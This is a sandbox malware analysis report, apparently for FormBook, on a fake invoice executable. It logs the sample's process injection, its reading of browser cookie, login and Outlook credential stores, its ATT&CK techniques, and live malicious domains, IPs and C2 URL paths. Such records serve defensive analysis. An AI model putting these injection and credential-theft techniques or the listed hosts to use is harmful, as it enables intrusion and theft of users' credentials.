            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtTerminateThread: Direct from: 0x76F02FCC
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtCreateUserProcess: Direct from: 0x76F0371C
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe | Memory written: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe | Section loaded: NULL target: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe | Section loaded: NULL target: C:\Windows\SysWOW64\RpcPing.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: NULL target: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe protection: read write
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: NULL target: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\RpcPing.exe | Thread register set: target process: 8104
            Source: C:\Windows\SysWOW64\RpcPing.exe | Thread APC queued: target process: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe | Process created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe"
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe | Process created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe"
            Source: C:\Windows\SysWOW64\RpcPing.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: fFUkGixTNm.exe, 00000007.00000000.2156839623.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930421120.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000009.00000002.2930653100.0000000001A20000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: fFUkGixTNm.exe, 00000007.00000000.2156839623.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930421120.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000009.00000002.2930653100.0000000001A20000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: fFUkGixTNm.exe, 00000007.00000000.2156839623.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930421120.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000009.00000002.2930653100.0000000001A20000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: fFUkGixTNm.exe, 00000007.00000000.2156839623.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930421120.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000009.00000002.2930653100.0000000001A20000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe | Queries volume information: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe VolumeInformation
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match | File source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\RpcPing.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\RpcPing.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\RpcPing.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\RpcPing.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\RpcPing.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\RpcPing.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\RpcPing.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\RpcPing.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\RpcPing.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match | File source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 11 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 14 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Timestomp | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 DLL Side-Loading | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
            [Behavior graph] Behavior Graph ID: 1523775; Sample: ORIGINAL INVOICE COAU723073...; Startdate: 02/10/2024; Architecture: WINDOWS; Score: 100
            Process chain shown in the graph:
            ORIGINAL INVOICE COAU7230734298.pdf.exe (started; dropped ORIGINAL INVOICE C...0734298.pdf.exe.log, ASCII; signature: Injects a PE file into a foreign processes)
              -> ORIGINAL INVOICE COAU7230734298.pdf.exe (started, two instances; signature: Maps a DLL or memory area into another process)
              -> fFUkGixTNm.exe (injected; signature: Found direct / indirect Syscall (likely to bypass EDR))
              -> RpcPing.exe (started; signatures: Tries to steal Mail credentials (via file / registry access), Tries to harvest and steal browser information (history, passwords, etc), Modifies the context of a thread in another process (thread injection), 3 other signatures)
              -> fFUkGixTNm.exe (injected; signature: Found direct / indirect Syscall (likely to bypass EDR)) and firefox.exe (started)
            Network nodes: www.kartal-nakliyat.xyz, www.yippie.world and 5 other IPs or domains (signature: Performs DNS queries to domains with low reputation); the injected fFUkGixTNm.exe contacts natroredirect.natrocdn.com 85.159.66.93 (CIZGITR, Turkey), www.sidqwdf.fun 185.106.176.204 (AS_LYREG3FR, United Kingdom) and 2 other IPs or domains.

            Source | Detection | Scanner | Label | Link
            ORIGINAL INVOICE COAU7230734298.pdf.exe | 39% | Virustotal | | Browse
            ORIGINAL INVOICE COAU7230734298.pdf.exe | 29% | ReversingLabs | |
            ORIGINAL INVOICE COAU7230734298.pdf.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            www.resellnexa.shop | 1% | Virustotal | | Browse
            natroredirect.natrocdn.com | 0% | Virustotal | | Browse
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            www.sidqwdf.fun | 185.106.176.204 | true | true | | unknown
            www.resellnexa.shop | 52.223.13.41 | true | true | | unknown
            yippie.world | 3.33.130.190 | true | false | | unknown
            natroredirect.natrocdn.com | 85.159.66.93 | true | true | | unknown
            www.yippie.world | unknown | unknown | true | | unknown
            www.kartal-nakliyat.xyz | unknown | unknown | true | | unknown
                                IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                52.223.13.41 | www.resellnexa.shop | United States | | 8987 | AMAZONEXPANSIONGB | true
                                185.106.176.204 | www.sidqwdf.fun | United Kingdom | | 204212 | AS_LYREG3FR | true
                                3.33.130.190 | yippie.world | United States | | 8987 | AMAZONEXPANSIONGB | false
                                85.159.66.93 | natroredirect.natrocdn.com | Turkey | | 34619 | CIZGITR | true
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1523775
                                Start date and time:2024-10-02 02:04:08 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 8m 13s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:10
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:2
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:ORIGINAL INVOICE COAU7230734298.pdf.exe
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@9/2@5/4
                                EGA Information:
                                • Successful, ratio: 80%
                                HCA Information:
                                • Successful, ratio: 96%
                                • Number of executed functions: 108
                                • Number of non-executed functions: 309
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target fFUkGixTNm.exe, PID 3492 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                Time | Type | Description
                                20:04:59 | API Interceptor | 1x Sleep call for process: ORIGINAL INVOICE COAU7230734298.pdf.exe modified
                                20:06:32 | API Interceptor | 141955x Sleep call for process: RpcPing.exe modified
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                52.223.13.41z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                • www.longfilsalphonse.net/iq05/
                                PO23100072.exeGet hashmaliciousFormBookBrowse
                                • www.timetime.store/hvm1/
                                RFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                                • www.insicilia.today/2fpq/
                                PO-000001488.exeGet hashmaliciousFormBookBrowse
                                • www.longfilsalphonse.net/8q1d/
                                RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                • www.tonesandtribes.shop/ypts/
                                2nd RFQ TECMARKQATAR PO33218_PDF.exeGet hashmaliciousFormBookBrowse
                                • www.insicilia.today/au5k/?mnShvP=RwVoEqK3tsH8ZJEwHaweRJTJSS8U5JHNbZExgB0fwJs27r15neVJV7QWQSSA6uFH9LK+YaA27MOdk5i2aapjRf+IeXUW+G7fHeqN3cIB/yUaJyZ7B1Ave/w=&Cbj=nB9LWdWpMT7tUBt
                                DCP11-83642024..exeGet hashmaliciousFormBookBrowse
                                • www.longfilsalphonse.net/rx9p/
                                SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                                • www.insicilia.today/2fpq/
                                SecuriteInfo.com.Win32.Malware-gen.24953.22588.exeGet hashmaliciousFormBookBrowse
                                • www.insicilia.today/au5k/?RD4=RwVoEqK3tsH8ZJEwHaweRJTJSS8U5JHNbZExgB0fwJs27r15neVJV7QWQSSA6uFH9LK+YaA27MOdk5i2aapjRf+IeXUW+G7fHeqN3cIB/yUaJyZ7B1Ave/w=&VzA=dz5HvTSP4ZdlFHDP
                                file.exeGet hashmaliciousFormBookBrowse
                                • www.longfilsalphonse.net/rx9p/
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                natroredirect.natrocdn.comArrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                • 85.159.66.93
                                P030092024LANDWAY.exeGet hashmaliciousFormBookBrowse
                                • 85.159.66.93
                                shipping documents_pdf.exeGet hashmaliciousFormBookBrowse
                                • 85.159.66.93
                                Quote #260924.exeGet hashmaliciousFormBookBrowse
                                • 85.159.66.93
                                Quote #270924.exeGet hashmaliciousFormBookBrowse
                                • 85.159.66.93
                                RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                • 85.159.66.93
                                CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                • 85.159.66.93
                                ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                • 85.159.66.93
                                rAGROTIS10599242024.exeGet hashmaliciousFormBookBrowse
                                • 85.159.66.93
                                oO3ZmCAeLQ.exeGet hashmaliciousFormBookBrowse
                                • 85.159.66.93
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                AS_LYREG3FRNOAH CRYPT.exeGet hashmaliciousFormBookBrowse
                                • 185.106.176.241
                                Payment Swift-67654.pdf.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                • 185.106.176.241
                                #U0423#U0432#U0435#U0434#U043e#U043c#U043b#U0435#U043d#U0438#U0435 #U2116 24357.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                • 185.106.176.241
                                RFQaswab46347858.bat.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                • 185.106.176.241
                                Payment Advice - Advice Ref[BIBBC2023189].exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                • 185.106.176.241
                                Payment details.scr.exeGet hashmaliciousFormBookBrowse
                                • 185.106.176.241
                                AWB# 6290868304.docx.docGet hashmaliciousFormBookBrowse
                                • 185.106.176.241
                                HQE5DRlPBT.exeGet hashmaliciousFormBookBrowse
                                • 185.106.176.241
                                SHIPMENT DOCUMENT.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                • 185.106.176.241
                                New PO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                • 185.106.178.60
                                AMAZONEXPANSIONGBhttp://www.johnhdaniel.comGet hashmaliciousUnknownBrowse
                                • 52.223.40.198
                                https://www.evernote.com/shard/s683/sh/202c4f3c-3650-93fd-8370-eaca4fc7cbbc/9PDECUYIIdOn7uDMCJfJSDfeqawh-oxMdulb3egg-jZJLZIoB686GWk5jgGet hashmaliciousHTMLPhisherBrowse
                                • 52.223.40.198
                                Audio_Msg..00299229202324Transcript.htmlGet hashmaliciousUnknownBrowse
                                • 52.223.40.198
                                https://wetransfer.com/downloads/fc718a7028ccd1e273879a61c0883fe420241001145250/8110e2eb5f5a56cc2015d1b3243d9b3120241001145309/33d289?trk=TRN_TDL_01&utm_campaign=TRN_TDL_01&utm_medium=email&utm_source=sendgridGet hashmaliciousHTMLPhisherBrowse
                                • 52.223.40.198
                                ORDER ENQUIRY.exeGet hashmaliciousFormBookBrowse
                                • 3.33.130.190
                                http://www.aieov.com/setup.exeGet hashmaliciousUnknownBrowse
                                • 3.33.243.145
                                https://www.afghanhayatrestaurant.com.au/Get hashmaliciousUnknownBrowse
                                • 3.33.243.145
